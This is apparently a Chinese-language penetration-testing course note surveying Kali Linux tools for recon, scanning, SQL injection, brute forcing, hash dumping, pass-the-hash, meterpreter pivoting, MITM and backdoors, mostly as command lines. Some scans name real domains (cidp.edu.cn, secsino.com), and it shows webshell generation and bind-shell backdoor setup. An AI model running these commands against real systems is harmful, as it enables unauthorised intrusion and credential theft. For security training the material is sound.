1.信息收集
目標在線主機,域名信息,郵箱地址,常用密碼,同網段信息,子域名信息,指紋信息,端口信息
2.漏洞分析
cisco工具集(cisoco工具)
fuzzing工具集
openvas
開源評估軟件
掃描工具集
數據庫評估軟件
3.漏洞利用
4.權限維持(創建一個后門)
5.文檔編輯
1.通過互聯網
searchdns.netcraft.com DNS查詢
shodaning.com大數據
http://www.exploit-db.com/google-dorks/
1 theHarverster信息搜集工具
theharvester -d microsoft.com -l 500 -b google
theharvester -d microsoft.com -b pgp
theharvester -d microsoft -l 200 -b linkedin
theharvester -d microsoft.com -l 500 -b all
2 metagoolefil
Usage: metagoofil options
-d: domain to search
-t: filetype to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
-l: limit of results to search (default 200)
-h: work with documents in directory (use "yes" for local analysis)
-n: limit of files to download
-o: working directory (location to save downloaded files)
-f: output file
Examples:
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
metagoofil.py -h yes -o applefiles -f results.html (local dir analysis)
域名系統是因特網的一項服務,它作為域名和IP地址相互映射的一個分布式的數據庫
從給定一個主域名到一個子域名的信息收集,是對目標的獲取與整理。dnsmap,dnsenum,fierce,dnsdict6
DNS區域傳送指得是一臺備用服務器使用來自主服務器的數據刷新自己的域數據庫。這為運行中的dns服務提供了一定的冗余度,其目的是為了防止主的域名服務器因意外故障變得不可用是影響到整個域名的解析。
一般來說,DNS區域傳送操作只在網絡里真的有備用域名DNS服務器時,才有必要用到,但許多DNS服務器卻別錯誤地配置成只要有client發出請求,就會向對方提供一個zone數據庫的詳細信息。
由此暴露出威脅:一旦黑客列出某個特定的zone的所有主機,收集域信息,即可選擇性的攻擊目標,找出未公開使用的IP地址,繞過基于網絡的訪問控制。
比如訪問163,可以把所有的IP地址全部列出來,公開的和不公開的,攻擊者就可以選擇一些弱的IP來進行攻擊。
使用dig進行域名解析(windows nklookup)
使用dig進行域傳送漏洞
子域名枚舉工具的介紹與使用
dig NS www.secsino.com
secsino.com. 5 IN NS ns3.cdncenter.com.
secsino.com. 5 IN NS ns6.cdncenter.com.
secsino.com. 5 IN NS ns4.cdncenter.com.
secsino.com. 5 IN NS ns5.cdncenter.com.
secsino.com. 5 IN NS ns2.cdncenter.com.
secsino.com. 5 IN NS ns1.cdncenter.com.
一個6個
來測試是否有域傳送漏洞信息
dig axfr @ns1.cndcenter.com secsino.com
DNS分析工具
fierce
fierce -dns www.secsino.com
進行查詢域傳送漏洞,如果沒有進行枚舉和破解
dnsmap secsino.com
dnsdict6 -4 secsino.com
netenum 192.168.1.1/24 >test
是通過ping來查看主機是否在線,不是特別靠譜,如果對方有防火墻就不可以了。可以生成一個列表。
fping -g ip
可以查看那些主機是存活的。
nbtscan -r 172.17.135.0/24
nbtscan -r 172.17.135.0/24
Doing NBT name scan for addresses from 172.17.135.0/24
IP address NetBIOS Name Server User MAC address
——————————————————————————
172.17.135.1 PC-20141108YKCA <server> <unknown> 24:b6:fd:1a:87:dd
172.17.135.2 REDBULL <server> <unknown> 00:0c:29:09:bb:e8
172.17.135.3 TXD-1419165F468 <server> <unknown> 00:0c:29:d2:45:88
172.17.135.131 BOBO <server> <unknown> 8c:89:a5:27:b5:b6
172.17.135.140 DYJ <server> <unknown> 08:10:76:df:4d:83
arping 172.17.135.4
可以查看到mac地址的
嗅探內網包(借助于一些ARP協議包的掃描)
netdiscover -h
Currently scanning: 192.168.224.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
—————————————————————————–
192.168.149.2 00:50:56:ef:8b:c6 03 180 VMWare, Inc.
192.168.149.1 00:50:56:c0:00:08 01 060 VMWare, Inc.
192.168.149.254 00:50:56:fa:94:bd 01 060 VMWare, Inc.
dmitry cidp.edu.cn
可以看到一些注冊人,和子域名的信息
wafw00f http://www.cidp.edu.cn
看是否有waf有保護,先用一個黑名單進行發送,然后看看發送回來有沒有。
Checking http://www.cidp.edu.cn
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 13
對目標是否存在負載均衡檢測器工具
可以檢測多個IP地址映射到單個域名
lbd www.cidp.edu.cn
(課程目的,課程介紹)
1主機探測 版本探測 系統探測 支持探測腳本的編寫
https 443 weblogic701 oracle 1521
nmap的使用
nmap -iL target.txt 保存到一個列表
zenmap
1.banner抓取最簡單最基礎,不需要專門的工具就可以做。banner抓取是應用程序的指紋識別而不是操作系統的識別。
curl -I www.cidp.edu.cn
curl -I www.cidp.edu.cn
HTTP/1.1 200 OK
Date: Mon, 01 Dec 2014 11:24:42 GMT
Server: Apache/2.0.59 (Unix)
Last-Modified: Mon, 01 Dec 2014 07:12:49 GMT
ETag: "ee8001-6939-568a5e40"
Accept-Ranges: bytes
Content-Length: 26937
Content-Type: text/html
有時候Telnet也可以進行探測,nc有時候也可以。
nmap -sV -Pn -sT www.cidp.edu.cn -p80
xprobe2 目標地址 對于老系統比較好
被動指紋識別工具
p0f 進行被動抓取數據包
web指紋識別
whatweb www.cidp.edu.cn
http://www.cidp.edu.cn [200] ActiveX[Flash-ActiveX][d27cdb6e-ae6d-11cf-96b8-444553540000], Adobe-Flash, Apache[2.0.59], Country[CHINA][CN], Frame, HTTPServer[Unix][Apache/2.0.59 (Unix)], IP[211.71.233.21], JQuery, Meta-Author[%E5%A4%A7%E6%B1%89%E7%BD%91%E7%BB%9C], Object["http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0]["clsid:d27cdb6e-ae6d-11cf-96b8-444553540000], Script[javascript,text/javascript], Title[%E9%98%B2%E7%81%BE%E7%A7%91%E6%8A%80%E5%AD%A6%E9%99%A2]
探取cms識別工具
wpscan -u www.91ri.org
針對smb利用工具
acccheck 主要檢查共享連接 ipc$ admin$,利用用戶名和密碼來進行攻擊。
amples
Attempt the 'Administrator' account with a [BLANK] password.
acccheck -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
acccheck -t 10.10.10.1 -P password.txt
Attempt all password in 'password.txt' against all users in 'users.txt'.
acccehck -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
acccheck -t 10.10.10.1 -u administrator -p password
smtp-user-enum 來查看有哪些郵箱等等
$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
$ smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1
$ smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt
$ smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1
sslscan ip 查看證書,查看是那種加密方式,最后可以得到一些公鑰信息
數據包分析工具 wireshark
做出作為一個nessus的子工具,也是一個綜合掃描的子工具。
先進行安裝
openvas-check-setup 檢查更新
openvas-mkcert 安裝證書(后面全部選擇默認)
openvas-nvt-sync 更新一些包
openvas-mkcert-client -n om -i 為客戶端創建證書
證書創建成功后,必須創建一個用戶進行登錄
openvasad -c add_user -n root -r Admin
openvassd 必須加載一個插件的加載
openvasmd –rebuild
更新漏洞庫內容
openvas-scapdata-sync 更新一些漏洞信息
openvas-certdata-sync
更新完以后可以運行 openvasmd –rebuild
更新完以后,需要結束openvassd進程,重新啟動服務,使用openvas-check-setup檢查無誤。
openvas-start
openvasmd 管理那個模塊沒有開啟,手動開啟
gsad –listen=0.0.0.0 –port=9392 –alisten=127.0.0.1 –aport=9390 –http-only
默認端口是9392端口打開的
https://localhost:9392/就可以進行登錄
1 golismero scan http://secsino.com
2 nikto -h www.secsino.com
nikto -h www.secsino.com -p 80,445,21 對指定端口進行掃描
lynis 系統信息收集工具
lynis –cheak–all
默認為當前的操作系統
unix-privesc-check standard
內部字典存放的位置
/usr/shell/wordlists
1.apche-users -h 172.17.135.4 -l /usr/share/wordlists/apache-user2.0.txt -p 80 -s 0 -e 403 -t 10
這個就是枚舉的過程,判斷目錄是否存在。
2.cutycap –url=http://www.baidu.com –out=baidu.png
相當于對百度網站直接做了一個截圖(快照)
3.強大的目錄掃描工具
dirb http://172.17.135.3
4.dirbuster 圖形化的界面工具
5.vega 相當于awvs ,但是不是商業化軟件
6.webslayer
web測試,暴力攻擊
cadaver
root@kaifeng:~# cadaver –help
Usage: cadaver [OPTIONS] http://hostname[:port]/path
Port defaults to 80, path defaults to '/'
Options:
-t, –tolerant Allow cd/open into non-WebDAV enabled collection.
-r, –rcfile=FILE Read script from FILE instead of ~/.cadaverrc.
-p, –proxy=PROXY[:PORT] Use proxy host PROXY and optional proxy port PORT.
-V, –version Display version information.
-h, –help Display this help message.
Please send bug reports and feature requests to <cadaver@webdav.org>
cadaver是一個用來瀏覽和修改webdav共享的Unix命令行程序,就像subversion客戶端,它使用了neon的http庫,不需要驚訝,neon和cadaver人作者是同一個人。cadaver是自由軟件。使用cadaver就像使用命令行的FTP程序,因此他很適合基本的webdav調試。它可以以壓縮的方式上傳和下載文件,也會檢驗屬性,拷貝,移動和鎖定和檢索文件。
1.cadaver http://172.17.135.22/dav/
可以put get 等等一系列操作和iisput差不多
davtest可以自動上傳一個漏洞文件,一些木馬文件
2.deblaze xss或者web會用到
3.fimap 遠程文件和本地的漏洞掃描文件,會檢測一些遠程和本地包含漏洞測試。
fimap -u "路徑" –force-run
就可以檢測到可以讀取那些內容
如果get一個webshell
fimap -x –force-run 根據提示來進行操作,上傳一個shell,然后在進行提權。
4.Grabber web漏洞掃描器
root@kaifeng:~# grabber -h
Usage: grabber.py [options]
Options:
-h, –help show this help message and exit
-u ARCHIVES_URL, –url=ARCHIVES_URL
Adress to investigate
-s, –sql Look for the SQL Injection
-x, –xss Perform XSS attacks
-b, –bsql Look for blind SQL Injection
-z, –backup Look for backup files
-d SPIDER, –spider=SPIDER
Look for every files
-i, –include Perform File Insertion attacks
-j, –javascript Test the javascript code ?
-c, –crystal Simple crystal ball test.
-e, –session Session evaluations
eg:grabber –spider 1 –sql –xss –url http://172.17.135.22/
5. joomscan 針對joomlacms來進行測試
6. skipfish 是Google出品的一款自動化網絡安全掃描工具
skipfish -o ~/home/kaifeng(自己創建的目錄) 很好工具http://www.cidp.edu.cn
7.uniscan-gui 一款圖形化界面
8.W3af 是一個應用程序攻擊檢查文件,支持許多插件
9.wapiti 的工作方式和nikto差不多
python wapiti.py http://172.17.135.22 -v 2
可以檢測文件處理錯誤(本地和遠程)數據庫注入
xss注入 xss注入 ldap注入 命令執行檢測(eval(),system(),passtru()。。)crlf注射入(http響應,session固定等等)
root@kaifeng:~# wapiti http://www.cidp.edu.cn
Wapiti-2.2.1 (wapiti.sourceforge.net)
Traceback (most recent call last):
File "/usr/bin/wapiti", line 444, in <module>
wap.browse(crawlerFile)
File "/usr/bin/wapiti", line 238, in browse
self.urls, self.forms = self.HTTP.browse(crawlerFile)
可以爬取一些信息
10.webshag-gui 綜合的條用一些插件
11.websploit 掃描遠程和分析系統漏洞。可以快速的掃描
wsf > show modules
Web Modules Description
——————- ———————
web/apache_users Scan Directory Of Apache Users
web/dir_scanner Directory Scanner
web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma PHPMyAdmin Login Page Scanner
web/cloudflare_resolver CloudFlare Resolver
Network Modules Description
——————- ———————
network/arp_dos ARP Cache Denial Of Service Attack
network/mfod Middle Finger Of Doom Attack
network/mitm Man In The Middle Attack
network/mlitm Man Left In The Middle Attack
network/webkiller TCP Kill Attack
network/fakeupdate Fake Update Attack Using DNS Spoof
network/arp_poisoner Arp Poisoner
Exploit Modules Description
——————- ———————
exploit/autopwn Metasploit Autopwn Service
exploit/browser_autopwn Metasploit Browser Autopwn Service
exploit/java_applet Java Applet Attack (Using HTML)
Wireless / Bluetooth Modules Description
——————- ———————
wifi/wifi_jammer Wifi Jammer
wifi/wifi_dos Wifi Dos Attack
wifi/wifi_honeypot Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack
1.tnscmd10g 不經常用
2.sqlsus 開放源代碼MySQL注入和接管工具
root@kaifeng:~# sqlsus
sqlsus version 0.7.2
Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
Usage:
sqlsus [options] [config file]
Options:
-h, –help brief help message
-v, –version version information
-e, –execute <commands> execute commands and exit
-g, –genconf <filename> generate configuration file
sqlsus -g test.comf 生成一個配置文件,然后進行編輯
修改 our $url_start="";寫入地址
啟動并且調試
sqlsus test.conf 獲取數據庫數據
查看全部數據庫名字
sqlsus>get database
sqlsus>set database 設定數據庫
sqlsus>set database mysql 選定為MySQL數據庫
sqlsus>get tables 獲取為MySQL的數據庫表
3.sqlninja 主要針對sqlserver數據庫,來返回一個xp_cmdshell,對sa口令的強力攻擊
root@kaifeng:~# sqlninja
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
Usage: /usr/bin/sqlninja
-m <mode> : Required. Available modes are: //指定攻擊模塊,有以下幾個
t/test – test whether the injection is working #測試連接是否是注入點
f/fingerprint – fingerprint user, xp_cmdshell and more #指紋識別,判斷用戶,數據庫,xp_cmdshell是否能用等等
b/bruteforce – bruteforce sa account #暴力破解sa密碼,可以使用-w指定字典,也可以不使用字典,這樣sqlninja就會自己窮舉
e/escalation – add user to sysadmin server role #提權用,必須用-p指定sa的password,成功就會把當前數據庫加入到sa組里面
x/resurrectxp – try to recreate xp_cmdshell #嘗試恢復xp_cmdshell
u/upload – upload a .scr file #使用get和post上傳二進制文件,-p可以指定sa的password,-g表示只生成上傳文件,但并不上傳
s/dirshell – start a direct shell # 獲得目標主機的shell
k/backscan – look for an open outbound port #查看開放的端口
r/revshell – start a reverse shell #反彈會一個shell,和dirshell相反
d/dnstunnel – attempt a dns tunneled shell #指定使用DNS作為傳輸通道,可用-p指定sa的password,為什么有這個模式。因為可能服務器連icmp都禁止。同樣想要使用這個模式得先用upload模式上傳dnstun.exe
i/icmpshell – start a reverse ICMP shell #檔dirshell和revshell都失敗的情況下,可以用這個模式把shell藏在icmp里,但是先要上傳imcpsh.exe(在upload模式里)
c/sqlcmd – issue a 'blind' OS command #以上方法都失敗之后,可以用它執行簡單的cmd命令,可惜的是沒回回顯
m/metasploit – wrapper to Metasploit stagers #使用metasploit作為shell
-f <file> : configuration file (default: sqlninja.conf) #指定配置文件,sqlninja沒有類似sqlmap的“-u”參數,注入網址是寫在配置文件里的,默認是sqlninja.conf。 用數字(0,1,2,3,4)來指定數據庫。
-p <password> : sa password
-w <wordlist> : wordlist to use in bruteforce mode (dictionary method
only)
-g : generate debug script and exit (only valid in upload mode)
-v : verbose output
-d <mode> : activate debug
1 – print each injected command
2 – print each raw HTTP request
3 – print each raw HTTP response
all – all of the above
…see sqlninja-howto.html for details
默認參數也要寫到配置文件里面,默認為sqlninja.conf
sqlmap
sqlmap -u "" –cookie='PHPSESSID=;secsicuty=low'
代理工具數據,進行抓包改包,暴力攻擊等等一些操作
1.burp suite 代理代表的一些工具
2.owasp-zap
3.vega 有一個代理
4.webscarab
webscarab一款代理軟件,包括http代理,網絡爬行、網絡蜘蛛,回話ID分析,自動腳本接口,模糊測試工具,web格式的編碼/解碼,web服務描述語言和soap解析器等功能模塊。webscarab基于gun協議,使用Java編寫,是webgoat中所使用的工具之一。
1.bed 能夠檢查緩存區溢出,格式串漏洞,整數溢出
bed -s FTP -t 172.17.132.2 -p 21 -o 5
2.ohrwurm 主要是rtp
3.wfuzz web應用的模糊測試工具,可以進行web應用暴力拆解,也支持對網站目錄,登錄信息,應用資源文件等的暴力猜解,還可以進行get及post參數的猜解,sql注入,xss漏洞的測試。改工具所有功能都依賴于字典。
wfuzz -c -z file,common.txt –hc 404 -o html http://www.baidu.com/FUZZ 2>tes.html
wfuzz -c -z file,users.txt -z file,pass.txt –hc 404 http://www.site.com/log.asp?user=FUZZ&pass=FUZZ
登錄頁面口令猜解,忽略404頁面
wfuzz -c -z range,1-10 –hc=BBB http://www.site.com/FUZZ{something}
頁面數目猜解,與burp不同的是,它更輕量級。
4.xsser 命令行版本和界面版本
xsser -u "http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=" –cookie="PHPSESSID=3f0cbd75725ed1a9b5d47396c4aeb2a7;security=low" -v
[*] List of possible XSS injections:
===========================================================================
[I] Target: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=
[+] Injection: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=/">a01a46f10d098c521b4eb470e82ea23f
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
1.cewl 是一個很酷的工具,通過爬行網站獲取關鍵信息創建一個密碼字典。
官網:http://digi.ninja/projects/cewl.php
2.cat 思科審計工具,掃描思科路由器的一般性漏洞:默認密碼snmpcommunity字符
3.findmyhash
findmyhash MD5 -h hash值 去找所有的網站的接口去破解
4.hydra
FTP
hydra -L user.txt -P pass.txt -F ftp://172.17.135.2
SSH
hydra -L user.txt -P pass.txt -F ssh://172.17.135.2:22
SMB
hydra -L user.txt -P pass.txt -F smb://172.17.135.2
MSSQL
hydra -L user.txt -P pass.txt -F mssql://172.17.135.2:1433
5.medusa
medusa -h 172.17.135.2 -u root -P //wordlist/rockyou.txt -M ssh
6.NCrack 基本功能相似,突出是3389爆破的功能
ncrack -vv -U windows.user -P windows.pwd 172.17.135.2:3389,CL=1 -f
7.onesixtyone 是一個snmp掃描工具,用于找出設備上的snmp community字符,掃描速度非常快。
8.patator Python編寫,如枚舉一個服務用戶名和密碼
patator ssh_login host=172.17.135.2 user=root passowrd=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'
9.phrasendrescher
10.thc-pptp-bruter 主要針對pptp VPN端點(tcp端口1723)的暴力破解程序。
1.ophcrack 彩虹表
2.pyrit 密碼無線攻擊
pyrit -r xxx.cap analyze
開始跑包(單純字典)
pyrit -r xxx.cap -i yyy.dic -b ssid attack_passthrough
也可以將pyrit與crunch結合使用
crunch 8 8 1234567890 | pyrit -i – -r /file/hack01-cap -b bssid attach_passthrough
3.rcrack 彩虹表密碼哈希工具
4.rsmangler
rsmangler -f /test 字典生成工具
5.bkhive Linux下破解window下哈希的工具
首先獲取win下的文件
Sam文件: c:windowssystem32configsam
system文件: c:windowssystem32configsystem
先用bkhive從system文件生成一個bootkey文件
bkhive system bootkey
再用bootkey和sam文件通過samdump2生成一個密碼hash文件
samdump2 sam bootkey >hashes
接著只用John破解John hashes即可。
6.sucrack 借助su命令進行本地root賬戶的密碼破解
7.truecrack
個人感覺主要利用msf(psexec)這個掃描模塊來進行傳遞hash,可以返回來一個payload。
通過Windows pwdump7.exe 來進行抓取hash
1.pth-winexe
pth-winexe -U Administrator和hash //172.17.135.2 cmd
這樣就可以返回一個本地的shell
2.keimpx
keimpx -t 172.17.135.2 -c /root/pass.txt -v 2 看pass.txt里面保存的hash來進行一一嘗試,是否可以進行連接
3.metaspoloit
exploit/windows/smb/psexse
在跳板機子獲取一定權限后,需要積極的向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,借助msf已經得到的meterpreter后門,可以使系列的操作更容易。
1.首先我們先看主機網卡信息,看有多少主機
2.如果我們拿到shell ip地址是 172.17.135.2,內網主機為10.0.0.1,因為內網ip我們是無妨訪問的。
3.首先我們先meterpreter里面增加一條路由
run autoroute -s 10.0.0.1 就把我們172段地址加入里面了
4.為了訪問,我們開一個socks代理模塊
use auxiliary/server/socks
exploit
這個時候我們已經創建一個代理了,然后把kali瀏覽器的代理設置成127.0.0.1 端口設置成1080,然后在訪問10.0.0.2,就可以訪問了內網的計算機了。
run arp_scanner -h 經常查看內網主機
run arp_scanner -r 10.0.0.1/24
默認的IP http://127.0.0.1:3000/ui/authentication
beef-xss提供了一個測試頁面
http://127.0.0.1:3000/demos/basic.html
最重要的一項是把beef和metasploit聯合起來。下面是配置命令
cd /usr/share/beef-xss/
vim config.yaml //把metaspoloit那一項改成true
cd /extension/metasploit
nano config.yaml //修改host和call_back都改成主機地址
然后打開msfconsole輸入以下命令
load msgrpc ServerHost=主機ip Pass=abc123
cd /usr/share/beef-xss/
./beef -x 重新加載metasploit模塊
這時候重啟一下服務
service beef-xss restart
1 命令行輸入 setoolkit打開set套件
輸入1為社會工程會攻擊
1魚叉式攻擊 2 網站攻擊框架 3 介質感染攻擊 4 創建payload攻擊 5群發郵件攻擊 6基于arduino的攻擊 7短信欺騙攻擊 8無線接入點攻擊 9二維碼攻擊 10 powershell攻擊 11 第三方模塊
1.魚叉式攻擊主要目的發送存在惡意軟件的釣魚軟件,相應的payload模塊可以選擇。
2.開放一個webserver服務,如果對方訪問此頁面,若系統存在漏洞觸發條件,則會被植入后門。 如Java applet attack 方法就需要目標有Java運行環境。為了仿真,你可以選擇自建模板或克隆一個網站。(重點演示,可以結合毒化和抓包來進行欺騙內網機子和劫持)
3 介質感染攻擊
借助autorun.inf執行exploit得到一個返回的shell,也可以結合metasploit的后門
fasttrack也被整理到setoolkit里面。
linux下的中間人攻擊套路都是一樣的,這里介紹進行ARP欺騙,DNS欺騙和嗅探以及回話劫持(cookie)的方法。
1 為kali設置開啟端口轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
2設置ssltrip
為了劫持ssl數據,需要使https數據變為https
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8081
讓ssltrip在8081端口監聽
sslstrip -l 8081
我們使用的工具ettercap這個中間人攻擊工具,如果是第一次使用,需要設置配置
配置文件/etc/ettercap/etter.conf 首先要將ec_uid,ec_gid都變為0
在把配置文件里面,在linux下面,把下面兩行注釋警號全部去掉
第一步打開 ettercap -G 圖形化界面
1.weevely 僅限php,相當于菜刀的一款工具
weevely generate test ~/1.php
連接:weevely http://172.17.135.3/1.php test(密碼)
2.webacoo
webacoo -t -u http://172.17.135.3/2.php
系統后門 首先我們先提取進程 ps aux | grep ~/bin/bash"
1.系統端:dbd -l -p 2333(bash進程號) -e /bin/bash -k password
連接端:dbd 127.0.0.1 2333 -k password
連接以后,機子并沒有什么反應,但是直接執行命令就可以了。
2.intersect
數字1 創建一個shell
然后依次為 bshell creds portscan 自由加了三個模塊。添加完以后就:create,然后輸入shell,還需要綁定端口 5555,遠程主機 172.17.135.3 遠程端口 23333 。這樣就設置完成了。完成以后,下面會給出保存的路徑。,默認為.py文件。
執行文件
./shell.py -b 綁定 那么這個時候就綁定這個端口了
我們在遠程用nc進行連接
nc -nvv 127.0.0.1 5555 這個時候就得到一個shell了。
1.cryptcat 使用方法與dbd 方法相似
所謂壓力測試,就是攻擊服務器所能承受的范圍,所謂的ddos攻擊。
主要是消耗某一種資源,來讓服務器不正常。
1.peepdf是一個使用Python編寫的PDF文件分析工具,它可以檢測惡意的pdf文件。其設計目標是為安全研究人員提供的pdf分析中可能用到的所有組件,無需使用3或4種工具來完成同一件任務。
2.反數字取證 用來檢測 linux下面關鍵命令是否被注入了后門。
3.內從取證工具集
volatility是開源的window,linux等內從取證分析工具,有Python編寫成,命令行操作,支持各種操作。
http://www.freebuf.com/articles/system/26763.html
4 binwalk 來判斷是什么文件格式,原始文件是什么。
5 dff 是一個簡單但強大的數字取證工具輔助工具,它具有一個靈活的模塊系統。具有多種功能,包括:恢復錯誤或奔潰導致文件丟失,證據的研究和分析等。pdf提供了一個強大的體系結構和一些有用的模塊。
1.dradis 基于瀏覽器的在線筆記
下一篇:linux進程管理